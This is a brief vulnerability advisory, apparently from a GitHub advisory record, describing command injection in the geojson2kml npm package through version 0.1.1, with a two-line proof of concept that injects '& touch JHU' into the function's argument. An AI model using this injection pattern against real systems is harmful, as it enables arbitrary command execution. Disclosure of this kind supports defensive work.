All versions up to and including version 0.1.1 of package geojson2kml are vulnerable to Command Injection via the index.js file.
var a =require("geojson2kml");
a("./","& touch JHU",function(){})
{
"cwe_ids": [
"CWE-77"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-07T20:58:30Z",
"nvd_published_at": "2021-02-23T15:15:00Z",
"severity": "CRITICAL"
}